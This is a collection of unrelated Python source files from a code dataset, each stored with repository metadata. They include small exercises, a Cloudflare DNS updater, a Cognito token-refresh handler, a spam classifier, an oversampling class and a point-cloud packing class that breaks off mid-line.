show_times=True,label='hotel_dependency-normal')\n dag_model.print_dag('rt_deviation', show_sync=True, show_times=True,label='hotel_dependency-normal')\n self.dag = dag_model\n dag_model.computeStatiscalTables(filename)\n\n def computeFinalTable(self):\n self.dag.computeResultTable()\n\n #\nfor i in range(11):\n MainHotelDependency().run(\"experiments/neptuneplus/%s-%d\" % (\"hotel/statistical\", i))\n\nDAG(nx.DiGraph(), 'Ord').computeResultTable(simulatorLebal=\"neptuneplus/hotel/statistical\")\n\n","repo_name":"iticongolo/resourceAllocationSimulators","sub_path":"main-dependence-hotel.py","file_name":"main-dependence-hotel.py","file_ext":"py","file_size_in_byte":5770,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"39131331285","text":"#HW4 part 2\n\nvalue_dict = {\n 'cito': 47.999,\n 'BB_studio': 42.999,\n 'momo': 49.999,\n 'main-service': 37.245,\n 'buy_now': 38.324,\n 'x-store': 37.166,\n 'the_partner': 38.988,\n 'sota': 37.720,\n 'rozetka': 38.003,\n}\n\nlower_limit = float(input('Введите нижний порог -> '))\nupper_limt = float(input('Введите верхний порог -> '))\n\nresults_dict = {}\n\nfor brand, price in value_dict.items():\n if lower_limit < price < upper_limt:\n results_dict[brand] = price\n\nprint(results_dict)\n\n\n\n","repo_name":"X4NDER78/HW4_part2","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":548,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"42215879032","text":"def rotLeft(a, d):\n '''\n In this challenge we have to \"rotate\" an array a to the left, given d rotations.\n\n My solution is not clever, once it uses way more memory than it's really needed.\n\n The new position of the elementss are only a translation given by d, so basically we'd write \"x_translated = x_original - d\"\n\n '''\n new = [0 for i in range(0,len(a))]\n nova_posicao = 0\n\n for i in range(len(a)):\n nova_posicao = i - d\n new[nova_posicao] = a[i]\n \n return new","repo_name":"tiborboglar/hacker_rank","sub_path":"Left Rotation.py","file_name":"Left Rotation.py","file_ext":"py","file_size_in_byte":512,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"21053592635","text":"#列表和元组的区别\n# 1.列表是可变序列,元素可以随时删除或修改。\n# 2.元组是不可变序列,元素不可以随时删除或修改。除非整体替换、\n#\n#列表和字典的区别\n# 1.列表是有序的对象集合\n# 2.字典是无序的对象集合\n\n#字典 {}大括号 存储一个物体的相关信息 \n\n\n\nfrom textwrap import indent\n\n\nxiaoming={\"name\":\"小明\",\n \"age\":18,\n \"height\":1.67,\n \"qq\":123456,\n \"weixin_name\":\"hhaha\"\n }\nprint(xiaoming)\nxiaoming_dict={\"name\":\"小明\"}\n#取值\nprint(xiaoming_dict[\"name\"])\n#增加/修改\n#如果key不存在,就新增加键值对。\n#如果key存在,就修改已经存在的键值对。\nxiaoming_dict[\"test\"]=18\nxiaoming_dict[\"name\"]=\"小小明\"\nprint(xiaoming_dict)\n#删除 del 或 pop \n# xiaoming_dict.pop('name')\n# del xiaoming_dict[\"name\"]\nprint(xiaoming_dict)\n\n\n\n# xiaoming={\"name\":\"小明\",\n# \"age\":18,\n# \"height\":1.67,\n# \"qq\":123456,\n# \"weixin_name\":\"hhaha\"\n# }\n# print(xiaoming)\n# #统计\n# print(len(xiaoming))\n# #合并\n# #注意:如果合并的字典包含已经存在的键值对,会覆盖原有的键值对\n# temp_list={\"xiaoxiaoming\":\"小小明\",\n# \"age\":10,\n# \"height\":135,\n# }\n# xiaoming.update(temp_list) \n# print(xiaoming) \n# #清空\n# xiaoming.clear()\n# print(xiaoming)\n\n\n# # 第一个%s输出key的内容\n# # 第一个%s输出value的内容\n# # 变量i是每一次循环中,获取到的键值对的key\n\n# #字典循环遍历\n# xiaoming={\"name\":\"小明\",\n# \"qq\":\"123456\",\n# \"weixin_name\":\"hhaha\"\n# }\n\n# for i in xiaoming:\n# print(\"%s 是 %s\" %(i,xiaoming[i])) \n\n\nxiaoming={\"name\":\"小明\",\n \"age\":18,\n \"height\":1.67,\n \"qq\":123456,\n \"weixin_name\":\"hhaha\"\n }\n\n\nfor key,value in xiaoming.items():\n print(key,value)\n\n\n\n","repo_name":"6iujiale/All_Projects","sub_path":"Python/python基础/练习/第四章/字典.py","file_name":"字典.py","file_ext":"py","file_size_in_byte":1982,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"73491522346","text":"import boto3\nimport os\nimport logging\n\nfrom utils import bad_request, response\n\n\nclient = boto3.client(\"cognito-idp\")\nCLIENT_ID = os.environ.get(\"COGNITO_CLIENT_ID\")\n\n\ndef handler(event, context):\n res = {}\n try:\n refresh_token = event[\"headers\"][\"Authorization\"].split()[1]\n res = client.initiate_auth(\n AuthFlow=\"REFRESH_TOKEN\",\n ClientId=CLIENT_ID,\n AuthParameters={\"REFRESH_TOKEN\": refresh_token}\n )\n except client.exceptions.NotAuthorizedException:\n err_msg = \"Invalid Refresh Token\"\n logging.warning(f\"!!! NotAuthorizedException: {err_msg}\")\n return bad_request(err_msg)\n except client.exceptions.InvalidParameterException:\n err_msg = \"Missing required parameter REFRESH_TOKEN\"\n logging.warning(f\"!!! InvalidParameterException: {err_msg}\")\n return bad_request(err_msg)\n except Exception as e:\n logging.warning(f\"!!! Other Exception: {e}\")\n return bad_request(repr(e))\n auth_result = res.get(\"AuthenticationResult\", {})\n res = {\n \"AccessToken\": auth_result.get(\"AccessToken\", \"\"),\n \"ExpiresIn\": auth_result.get(\"ExpiresIn\", \"\"),\n \"TokenType\": auth_result.get(\"TokenType\", \"\"),\n }\n return response(200, res)\n","repo_name":"barabanpan/aws-cognito-serverless","sub_path":"{{cookiecutter.project_slug}}/code/auth/refresh/refresh.py","file_name":"refresh.py","file_ext":"py","file_size_in_byte":1270,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"24585551879","text":"\"\"\"YAML Cloudflare Config Parser.\"\"\"\n\nimport os\n\nimport requests\nimport yaml\n\nfrom ip_lock.exceptions import DNSZoneNameNotFound, DNSRecordsError, InvalidAuthToken\nfrom ip_lock.log import get_logger\nfrom ip_lock.ip import public_ip_address\n\n\nclass Cloudflare:\n \"\"\"Converts YAML file into Cloudflare Config Object\n \"\"\"\n\n def __init__(self, user_config):\n loglevel = \"DEBUG\" if user_config.verbose else os.getenv(\"LOGLEVEL\", None)\n self.logger = get_logger(\"ip_lock.Cloudflare\", loglevel=loglevel)\n\n config_path = os.path.join(\n os.path.dirname(os.path.realpath(__file__)), \"cloudflare.yml\"\n )\n with open(config_path) as f:\n self.__dict__.update(yaml.safe_load(f))\n self.__dict__.update(user_config.__dict__)\n self._update_headers()\n self._validate_auth_token()\n self.__dict__.update({\"public_ip_address\": public_ip_address()})\n\n def _update_headers(self):\n \"\"\"Update headers dictionary with user defined values\n \"\"\"\n headers = {\n \"Authorization\": f'{self.headers[\"Authorization\"]}{self.auth_token}',\n # \"X-Auth-Key\": self.auth_token,\n \"X-Auth-Email\": self.auth_email,\n \"Content-Type\": \"application/json\",\n }\n self.headers = headers\n\n def _validate_auth_token(self):\n \"\"\"Validate CloudFlare Token\n \"\"\"\n url = \"{}/user/tokens/verify\".format(self.base_api_uri)\n res = requests.get(url, headers=self.headers).json()\n if not res[\"success\"]:\n raise InvalidAuthToken(f\"Invalid Auth Token: {self.auth_token}\\n\" f\"{res}\")\n\n def find_zone_id_by_name(self):\n \"\"\"Find your Zone ID by DNS name\n \"\"\"\n url = \"{}/zones?name={}\".format(self.base_api_uri, self.dns_zone_name)\n response = requests.get(url, headers=self.headers)\n if response and response.status_code == 200:\n result = response.json()[\"result\"]\n return result[0][\"id\"]\n raise DNSZoneNameNotFound(f'DNS Zone Name: \"{self.dns_zone_name}\" ' \"not found\")\n\n def list_dns_records(self):\n \"\"\"List DNS records for CloudFlare Zone\n\n GET /zones/:zone_identifier/dns_records\n \"\"\"\n url = \"{}/zones/{}/dns_records?\".format(self.base_api_uri, self.dns_zone_id)\n if hasattr(self, \"dns_record_type\") and self.dns_record_type:\n url = f\"{url}type={self.dns_record_type}\"\n response = requests.get(url, headers=self.headers)\n if response and response.status_code == 200:\n return response.json()[\"result\"]\n raise DNSRecordsError(\n f\"Response Code: {response.status_code} \\n\",\n f\"Response Body: {response.json()}\",\n )\n\n def should_update_records(self, records):\n \"\"\"Determine if public IP has changed\n \"\"\"\n for record in records:\n if record[\"content\"] != self.public_ip_address:\n return True\n return False\n\n def reduce_to_targets(self, records):\n \"\"\"Reduce DNS records to self.target_zone_names\n \"\"\"\n targets = []\n for record in records:\n if record[\"name\"] in self.target_zone_names:\n targets.append(record)\n return targets\n\n def update_dns_record(self, record):\n \"\"\"Update DNS Record IP Address\n \"\"\"\n url = \"{}/zones/{}/dns_records/{}\".format(\n self.base_api_uri, self.dns_zone_id, record[\"id\"]\n )\n payload = {\n \"type\": record[\"type\"],\n \"name\": record[\"name\"],\n \"content\": self.public_ip_address,\n }\n self.logger.debug(\"{} {}\".format(\"PUT\", url))\n self.logger.debug(payload)\n if self.dry_run:\n self.logger.debug(\"Dry run, not actually sending request.\")\n return True\n return requests.put(url, json=payload, headers=self.headers).json()[\"success\"]\n\n def update(self):\n \"\"\"Update DNS records (if we need too)\n \"\"\"\n self.dns_zone_id = self.find_zone_id_by_name()\n records = self.reduce_to_targets(self.list_dns_records())\n if not self.force and not self.should_update_records(records):\n self.logger.debug(\n \"Public IP address matches DNS \" \"records, no update needed.\"\n )\n return\n\n if not self.force:\n self.logger.debug(\"Public IP address changed! Updating DNS Records...\")\n else:\n self.logger.debug(\"Forcing update of DNS Records...\")\n self.logger.debug(\n \"{} --> {}\".format(records[0][\"content\"], self.public_ip_address)\n )\n\n self.logger.debug(\"\")\n self.logger.debug(\"Updating {} records...\".format(len(records)))\n for record in records:\n if not self.force and record[\"content\"] == self.public_ip_address:\n continue\n self.logger.debug(\"\")\n self.logger.debug(\"Updating: {}...\".format(record[\"name\"]))\n if self.update_dns_record(record):\n self.logger.debug(\"Update Successful.\")\n continue\n self.logger.debug(\"Update Failed.\")\n self.logger.debug(\"\")\n self.logger.debug(\"Complete.\")\n","repo_name":"chasenicholl/ip-lock","sub_path":"ip_lock/providers/cloudflare.py","file_name":"cloudflare.py","file_ext":"py","file_size_in_byte":5247,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"71633994988","text":"# https://open.kattis.com/problems/sibice\n\nmatches, width, height = map(int, input().split())\n\nhypot = (width**2 + height**2) ** 0.5\n\nfor _ in range(matches):\n length = int(input())\n print(\"DA\") if length <= hypot else print(\"NE\")\n\n\n\n","repo_name":"gosueep/Kattis","sub_path":"Easy/Sibice.py","file_name":"Sibice.py","file_ext":"py","file_size_in_byte":240,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"6358168271","text":"import os\r\nimport sys\r\nimport json\r\nfrom math import log\r\nfrom pprint import pprint\r\n\r\ntrainData = None\r\nprint_fp = None\r\ntotalFiles = 0\r\nspamFiles = 0\r\nhamFiles = 0\r\nspamWords = 0\r\nhamWords = 0\r\nvocabSize = 0\r\n\r\ndef print_output(label, path):\r\n global print_fp\r\n output = label + ' ' + path + '\\n'\r\n print_fp.write(output)\r\n\r\n\r\ndef get_training_data():\r\n global trainData, totalFiles,spamWords,hamFiles,spamFiles, spamWords,hamWords,vocabSize\r\n with open('nbmodel.txt','r',encoding='latin1') as fp:\r\n trainData = json.loads(fp.read(),encoding='latin1')\r\n totalFiles = trainData['totalFilesCount']\r\n spamFiles = trainData['spamFilesCount']\r\n hamFiles = trainData['hamFilesCount']\r\n spamWords = trainData['spamWordsCount']\r\n hamWords = trainData['hamWordsCount']\r\n vocabSize = trainData['vocabSize']\r\n\r\ndef calculate_naive_bayes(classify_tokens,file_path):\r\n global spamFiles,hamFiles,hamWords,spamWords,vocabSize,print_fp\r\n prob_spam = log((spamFiles/totalFiles))\r\n prob_ham = log((hamFiles/totalFiles))\r\n for eachToken in classify_tokens:\r\n if eachToken in trainData['trainData'].keys():\r\n prob_spam += log((trainData['trainData'][eachToken]['spam'] + 1)/ (spamWords + vocabSize))\r\n prob_ham += log((trainData['trainData'][eachToken]['ham'] + 1)/ (hamWords + vocabSize))\r\n if (prob_ham >= prob_spam):\r\n print_output('ham',file_path)\r\n else:\r\n print_output('spam',file_path)\r\n\r\ndef classify(path):\r\n global print_fp\r\n\r\n with open('nboutput.txt',mode='w') as print_fp:\r\n for root,dir,files in os.walk(path,topdown=False):\r\n for fname in files:\r\n file_path = os.path.join(root,fname)\r\n with open(file_path,'r',encoding='latin1') as fp:\r\n devData = fp.read()\r\n classify_tokens = devData.strip().split()\r\n calculate_naive_bayes(classify_tokens,file_path)\r\n\r\nif __name__ == '__main__':\r\n path = sys.argv[1]\r\n get_training_data()\r\n classify(path)","repo_name":"venkys2002/Spam-detection-Email-Classifier-","sub_path":"nbclassify_stopwords.py","file_name":"nbclassify_stopwords.py","file_ext":"py","file_size_in_byte":2077,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"9295341710","text":"\"\"\"new schema, sprites and image strips\n\nRevision ID: 681f51ea0301\nRevises: 88799a3f5dec\nCreate Date: 2023-08-28 19:56:11.059846\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = '681f51ea0301'\ndown_revision = '88799a3f5dec'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n with op.batch_alter_table('fighters', schema=None) as batch_op:\n batch_op.add_column(sa.Column('image_strip', sa.String(), nullable=True))\n batch_op.drop_column('sprite_punch')\n batch_op.drop_column('sprite_kick')\n batch_op.drop_column('sprite_block')\n\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n with op.batch_alter_table('fighters', schema=None) as batch_op:\n batch_op.add_column(sa.Column('sprite_block', sa.VARCHAR(), nullable=True))\n batch_op.add_column(sa.Column('sprite_kick', sa.VARCHAR(), nullable=True))\n batch_op.add_column(sa.Column('sprite_punch', sa.VARCHAR(), nullable=True))\n batch_op.drop_column('image_strip')\n\n # ### end Alembic commands ###\n","repo_name":"AmroGT500/project-fighter","sub_path":"server/migrations/versions/681f51ea0301_new_schema_sprites_and_image_strips.py","file_name":"681f51ea0301_new_schema_sprites_and_image_strips.py","file_ext":"py","file_size_in_byte":1207,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"15110914422","text":"import pyaudio\nimport numpy as np\n\nclass MusicPlayer:\n def __init__(self, tempo=10, volume=0.1):\n self.tempo = tempo\n self.volume = volume\n self.sample_rate = 44100\n self.ticks_per_beat = 4\n self.note_duration = 60 / self.tempo / self.ticks_per_beat\n self.p = pyaudio.PyAudio()\n self.stream = None\n\n def play_notes(self, notes):\n if self.stream and self.stream.is_active():\n self.stream.stop_stream()\n self.stream.close()\n\n # Calculate total duration of the music\n total_duration = sum(note[1] for note in notes) * self.note_duration\n\n # Generate samples for each note\n samples = []\n for note in notes:\n frequency = 440 * 2 ** ((note[0] - 69) / 12)\n duration = note[1] * self.note_duration\n samples += self._generate_samples(frequency, duration)\n\n # Convert the list of samples to a numpy array\n samples = np.array(samples)\n\n # Scale the samples to the desired volume\n samples *= self.volume\n\n # Open a new audio stream and play the samples\n self.stream = self.p.open(\n format=pyaudio.paFloat32,\n channels=1,\n rate=self.sample_rate,\n output=True\n )\n self.stream.write(samples.tobytes())\n\n def _generate_samples(self, frequency, duration):\n # Generate samples for a sine wave with the given frequency and duration\n duration = 1\n samples = self.sample_rate * duration\n t = np.linspace(0, duration, samples, False)\n note = np.sin(frequency * t * 2 * np.pi)\n return note.astype(np.float32)\n\n def close(self):\n if self.stream and self.stream.is_active():\n self.stream.stop_stream()\n self.stream.close()\n self.p.terminate()\n\nnotes = [(69, 1), (71, 4), (73, 4), (74, 4), (76, 4), (78, 4), (80, 4), (81, 4)]\n\nplayer = MusicPlayer(tempo=10, volume=0.1)\nplayer.play_notes(notes)\nimport time\n# Wait for the music to finish playing\ntime.sleep(len(notes) * player.note_duration)\n\n# Close the audio stream\nplayer.close()\n","repo_name":"naren-m/music","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":2143,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"12879061766","text":"\"\"\"\r\nThis module implements the ADOMS method.\r\n\"\"\"\r\n\r\nimport numpy as np\r\n\r\nfrom sklearn.decomposition import PCA\r\n\r\nfrom ..base import NearestNeighborsWithMetricTensor, coalesce\r\nfrom ..base import OverSampling\r\n\r\nfrom .._logger import logger\r\n_logger = logger\r\n\r\n__all__= ['ADOMS']\r\n\r\nclass ADOMS(OverSampling):\r\n \"\"\"\r\n References:\r\n * BibTex::\r\n\r\n @INPROCEEDINGS{adoms,\r\n author={Tang, S. and Chen, S.},\r\n booktitle={2008 International Conference on\r\n Information Technology and\r\n Applications in Biomedicine},\r\n title={The generation mechanism of synthetic\r\n minority class examples},\r\n year={2008},\r\n volume={},\r\n number={},\r\n pages={444-447},\r\n keywords={medical image processing;\r\n generation mechanism;synthetic\r\n minority class examples;class\r\n imbalance problem;medical image\r\n analysis;oversampling algorithm;\r\n Principal component analysis;\r\n Biomedical imaging;Medical\r\n diagnostic imaging;Information\r\n technology;Biomedical engineering;\r\n Noise generators;Concrete;Nearest\r\n neighbor searches;Data analysis;\r\n Image analysis},\r\n doi={10.1109/ITAB.2008.4570642},\r\n ISSN={2168-2194},\r\n month={May}}\r\n \"\"\"\r\n\r\n categories = [OverSampling.cat_dim_reduction,\r\n OverSampling.cat_extensive,\r\n OverSampling.cat_metric_learning]\r\n\r\n def __init__(self,\r\n proportion=1.0,\r\n n_neighbors=5,\r\n *,\r\n nn_params=None,\r\n n_jobs=1,\r\n random_state=None,\r\n **_kwargs):\r\n \"\"\"\r\n Constructor of the sampling object\r\n\r\n Args:\r\n proportion (float): proportion of the difference of n_maj and\r\n n_min to sample e.g. 1.0 means that after\r\n sampling the number of minority samples\r\n will be equal to the number of majority\r\n samples\r\n n_neighbors (int): parameter of the nearest neighbor component\r\n nn_params (dict): additional parameters for nearest neighbor calculations, any\r\n parameter NearestNeighbors accepts, and additionally use\r\n {'metric': 'precomputed', 'metric_learning': '', ...}\r\n with in 'ITML', 'LSML' to enable the learning of\r\n the metric to be used for neighborhood calculations\r\n n_jobs (int): number of parallel jobs\r\n random_state (int/RandomState/None): initializer of random_state,\r\n like in sklearn\r\n \"\"\"\r\n super().__init__(random_state=random_state, checks=None)\r\n\r\n self.check_greater_or_equal(proportion, 'proportion', 0.0)\r\n self.check_greater_or_equal(n_neighbors, 'n_neighbors', 1)\r\n self.check_n_jobs(n_jobs, 'n_jobs')\r\n\r\n self.proportion = proportion\r\n self.n_neighbors = n_neighbors\r\n self.nn_params = coalesce(nn_params, {})\r\n self.n_jobs = n_jobs\r\n\r\n @classmethod\r\n def parameter_combinations(cls, raw=False):\r\n \"\"\"\r\n Generates reasonable parameter combinations.\r\n\r\n Returns:\r\n list(dict): a list of meaningful parameter combinations\r\n \"\"\"\r\n parameter_combinations = {'proportion': [0.1, 0.25, 0.5, 0.75,\r\n 1.0, 1.5, 2.0],\r\n 'n_neighbors': [3, 5, 7]}\r\n return cls.generate_parameter_combinations(parameter_combinations, raw)\r\n\r\n def generate_sample_in_neighborhood(self, sample, neighbors):\r\n \"\"\"\r\n Generate artificial sample in a neighborhood.\r\n\r\n Args:\r\n sample (np.array): one sample point\r\n neighbors (np.array): the sample's neighbors\r\n\r\n Returns:\r\n np.array: the generated sample\r\n \"\"\"\r\n # fitting the PCA\r\n pca = PCA(n_components=1)\r\n pca.fit(neighbors)\r\n\r\n # extracting the principal direction\r\n principal_direction = pca.components_[0]\r\n\r\n # do the sampling according to the description in the paper\r\n random_index = self.random_state.randint(1, len(neighbors))\r\n random_neighbor = neighbors[random_index]\r\n diff = np.linalg.norm(random_neighbor - sample)\r\n rand = self.random_state.random_sample()\r\n inner_product = np.dot(random_neighbor - sample,\r\n principal_direction)\r\n sign = 1.0 if inner_product > 0.0 else -1.0\r\n\r\n return sample + sign*rand*diff*principal_direction\r\n\r\n def sampling_algorithm(self, X, y):\r\n \"\"\"\r\n Does the sample generation according to the class parameters.\r\n\r\n Args:\r\n X (np.ndarray): training set\r\n y (np.array): target labels\r\n\r\n Returns:\r\n (np.ndarray, np.array): the extended training set and target labels\r\n \"\"\"\r\n n_to_sample = self.det_n_to_sample(self.proportion)\r\n\r\n if n_to_sample == 0:\r\n return self.return_copies(X, y, \"no need for sampling\")\r\n\r\n X_min = X[y == self.min_label]\r\n\r\n # fitting nearest neighbors model\r\n n_neighbors = np.min([len(X_min), self.n_neighbors+1])\r\n\r\n nn_params= {**self.nn_params}\r\n nn_params['metric_tensor']= self.metric_tensor_from_nn_params(nn_params, X, y)\r\n\r\n nearestn= NearestNeighborsWithMetricTensor(n_neighbors=n_neighbors,\r\n n_jobs=self.n_jobs,\r\n **(nn_params))\r\n nearestn.fit(X_min)\r\n indices = nearestn.kneighbors(X_min, return_distance=False)\r\n\r\n samples = []\r\n for _ in range(n_to_sample):\r\n index = self.random_state.randint(len(X_min))\r\n neighbors = X_min[indices[index]]\r\n sample = X_min[index]\r\n\r\n samples.append(self.generate_sample_in_neighborhood(sample,\r\n neighbors))\r\n\r\n return (np.vstack([X, np.vstack(samples)]),\r\n np.hstack([y, np.repeat(self.min_label, len(samples))]))\r\n\r\n def get_params(self, deep=False):\r\n \"\"\"\r\n Returns:\r\n dict: the parameters of the current sampling object\r\n \"\"\"\r\n return {'proportion': self.proportion,\r\n 'n_neighbors': self.n_neighbors,\r\n 'nn_params': self.nn_params,\r\n 'n_jobs': self.n_jobs,\r\n **OverSampling.get_params(self)}\r\n","repo_name":"analyticalmindsltd/smote_variants","sub_path":"smote_variants/oversampling/_adoms.py","file_name":"_adoms.py","file_ext":"py","file_size_in_byte":7488,"program_lang":"python","lang":"en","doc_type":"code","stars":553,"dataset":"github-code","pt":"37"} +{"seq_id":"25702141128","text":"from threading import local\nimport numpy as np\nimport open3d as o3d\nimport copy\nimport math\n\nclass DirectLine():\n def __init__(self):\n self.translation = None\n self.rotation = None\n self.start = None\n self.end = None\n self.unit = None\n \n\nclass BoxContainer():\n def __init__(self):\n self.dx = 0\n self.dy = 0\n self.dz = 0\n self.x = 0\n self.y = 0\n self.z = 0\n self.rotation = np.eye(3)\n self.pcd = None\n self.obbox = None\n self.direction_x = None\n self.direction_y = None\n self.direction_z = None\n self.items = []\n self.prompt_box = None\n self.volume = 0\n self.acc_space = 0\n\n def set_pcd(self, pcd):\n self.pcd = pcd\n\n def add_item(self, it):\n self.items.append(it)\n\n def est_acc_space(self):\n self.acc_space = 0\n \n def set_obbox(self, extent, translation, rotation):\n self.dx = extent[0]\n self.dy = extent[1]\n self.dz = extent[2]\n self.x = translation[0]\n self.y = translation[1]\n self.z = translation[2]\n self.rotaiton = rotation \n self.obbox = o3d.geometry.OrientedBoundingBox(translation, rotation, extent)\n self.volume = self.obbox.extent[0] * self.obbox.extent[1] * self.obbox.extent[2]\n \n self.direction_y = DirectLine()\n center = np.array([[self.obbox.center[0]],[self.obbox.center[1]],[self.obbox.center[2]]])\n self.direction_y.start = np.array([[0], [-self.obbox.extent[1]/2], [0]])\n self.direction_y.start = self.obbox.R @ self.direction_y.start + center\n self.direction_y.translation = self.direction_y.start.T[0]\n self.direction_y.end = np.array([[0], [self.obbox.extent[1]/2], [0]])\n self.direction_y.end = self.obbox.R @ self.direction_y.end + center\n self.direction_y.unit = (self.direction_y.end - self.direction_y.start).T[0]\n self.direction_y.unit = self.direction_y.unit / np.linalg.norm(self.direction_y.unit)\n local = np.array([[1,0,0],[0,0,1],[0,-1,0]])\n self.direction_y.rotation = self.obbox.R @ local\n\n self.direction_x = DirectLine()\n center = np.array([[self.obbox.center[0]],[self.obbox.center[1]],[self.obbox.center[2]]])\n self.direction_x.start = np.array([[-self.obbox.extent[0]/2], [0], [0]])\n self.direction_x.start = self.obbox.R @ self.direction_x.start + center\n self.direction_x.translation = self.direction_x.start.T[0]\n self.direction_x.end = np.array([[self.obbox.extent[0]/2], [0], [0]])\n self.direction_x.end = self.obbox.R @ self.direction_x.end + center\n self.direction_x.unit = (self.direction_x.end - self.direction_x.start).T[0]\n self.direction_x.unit = self.direction_x.unit / np.linalg.norm(self.direction_x.unit)\n local = np.array([[0,0,1],[0,1,0],[-1,0,0]])\n self.direction_x.rotation = self.obbox.R @ local\n \n self.direction_z = DirectLine()\n center = np.array([[self.obbox.center[0]],[self.obbox.center[1]],[self.obbox.center[2]]])\n self.direction_z.start = np.array([[0], [0], [self.obbox.extent[2]/2]])\n self.direction_z.start = self.obbox.R @ self.direction_z.start + center\n self.direction_z.translation = self.direction_z.start.T[0]\n self.direction_z.end = np.array([[0], [0], [-self.obbox.extent[2]/2]])\n self.direction_z.end = self.obbox.R @ self.direction_z.end + center\n self.direction_z.unit = (self.direction_z.end - self.direction_z.start).T[0]\n self.direction_z.unit = self.direction_z.unit / np.linalg.norm(self.direction_z.unit)\n local = np.array([[-1,0,0],[0,1,0],[0,0,-1]])\n self.direction_z.rotation = self.obbox.R @ local\n\n def gt_empty(self):\n rem_space = self.volume\n for pkg in self.items:\n rem_space -= pkg.volume\n return rem_space\n\n def acc_empty(self, unit = 0.02):\n new_pcd = copy.deepcopy(self.pcd)\n new_pcd.translate(-self.obbox.center)\n inv_rotate = np.linalg.inv(self.obbox.R)\n new_pcd.rotate(inv_rotate, center = [0,0,0])\n\n\n extent = [unit, unit, self.obbox.extent[2]]\n rotation = np.array([[1,0,0],[0,1,0],[0,0,1]])\n center = np.array([-self.obbox.extent[0]/2+unit/2,-self.obbox.extent[1]/2+unit/2,0])\n grid = o3d.geometry.OrientedBoundingBox(center, rotation, extent)\n\n x_count = int(self.obbox.extent[0]/unit)\n y_count = int(self.obbox.extent[1]/unit)\n ceiling = self.obbox.extent[2]/2\n self.acc_space = 0\n for i in range(0, x_count):\n for j in range(0, y_count):\n local_grid = copy.deepcopy(grid)\n local_grid.translate([i * unit, j * unit, 0])\n local_pcd = new_pcd.crop(local_grid)\n local_points = np.asarray(local_pcd.points)\n # if i == 10 and j == 15:\n # vis = o3d.visualization.Visualizer()\n # vis.create_window()\n # vis.add_geometry(new_pcd)\n # vis.add_geometry(local_grid)\n # opt = vis.get_render_option()\n # opt.show_coordinate_frame = True\n # vis.run()\n # vis.destroy_window()\n # print(\"done\")\n if len(local_points) > 5:\n avg = np.average(local_points, axis=0)\n self.acc_space += unit * unit * (ceiling-avg[2])\n\n return self.acc_space\n\n def estimate_place(self, bbox, z, step = 0.02, side_step = 0.01):\n self.prompt_box = bbox\n rotation = np.array([[1,0,0],[0,0.866,-0.5],[0,0.5,0.866]])\n self.prompt_box.rotate(rotation, center = [0,0,0])\n self.prompt_box.rotate(self.direction_y.rotation, center = [0,0,0])\n self.prompt_box.translate(self.direction_y.translation)\n self.prompt_box.translate([0,0,-z])\n length = self.prompt_box.extent[1] / 4 + self.prompt_box.extent[2]\n self.prompt_box.translate(length*self.direction_y.unit)\n count = int(self.obbox.extent[1] / step)\n result = 0\n good_config = [0,0,0]\n for i in range(0, count):\n flag = False\n for j in range(-5, 6):\n for t in range(-5, 6):\n local_box = copy.deepcopy(self.prompt_box)\n local_box.translate(i*step*self.direction_y.unit)\n local_box.translate(j*side_step*self.direction_x.unit)\n local_box.translate(t*side_step*self.direction_z.unit)\n local_pcd = self.pcd.crop(local_box)\n if (flag == False) and (len(local_pcd.points) < 100):\n flag = True\n good_config = [j,i,t]\n break\n if flag == True:\n break\n if flag == False:\n break\n\n self.prompt_box.translate(good_config[1]*step*self.direction_y.unit)\n self.prompt_box.translate(good_config[0]*side_step*self.direction_x.unit)\n self.prompt_box.translate(good_config[2]*side_step*self.direction_z.unit)\n\n return self.prompt_box\n\n def crop_box(self):\n self.pcd = self.pcd.crop(self.obbox)\n\n def viz(self, pcd = True, obbox = True, item = True, direction = True, place_box = True):\n vis = o3d.visualization.Visualizer()\n vis.create_window()\n if self.pcd and pcd:\n vis.add_geometry(self.pcd)\n if self.obbox and obbox:\n vis.add_geometry(self.obbox)\n if item and len(self.items):\n for it in self.items:\n if it.pcd:\n vis.add_geometry(it.pcd)\n if it.mesh_pcd:\n vis.add_geometry(it.mesh_pcd)\n if self.direction_x is not None and direction:\n red_color = np.array([255, 0, 0])\n length = math.sqrt(np.sum((self.direction_x.start - self.direction_x.end) ** 2))\n arrow = o3d.geometry.TriangleMesh.create_arrow(0.01, 0.015, length, 0.04)\n arrow.paint_uniform_color(red_color / 255)\n arrow.rotate(self.direction_x.rotation, center = [0,0,0])\n arrow.translate(self.direction_x.translation)\n vis.add_geometry(arrow)\n if self.direction_y is not None and direction:\n green_color = np.array([0, 255, 0])\n length = math.sqrt(np.sum((self.direction_y.start - self.direction_y.end) ** 2))\n arrow = o3d.geometry.TriangleMesh.create_arrow(0.01, 0.015, length, 0.04)\n arrow.paint_uniform_color(green_color / 255)\n arrow.rotate(self.direction_y.rotation, center = [0,0,0])\n arrow.translate(self.direction_y.translation)\n vis.add_geometry(arrow)\n if self.direction_z is not None and direction:\n blue_color = np.array([0, 0, 255])\n length = math.sqrt(np.sum((self.direction_z.start - self.direction_z.end) ** 2))\n arrow = o3d.geometry.TriangleMesh.create_arrow(0.01, 0.015, length, 0.04)\n arrow.paint_uniform_color(blue_color / 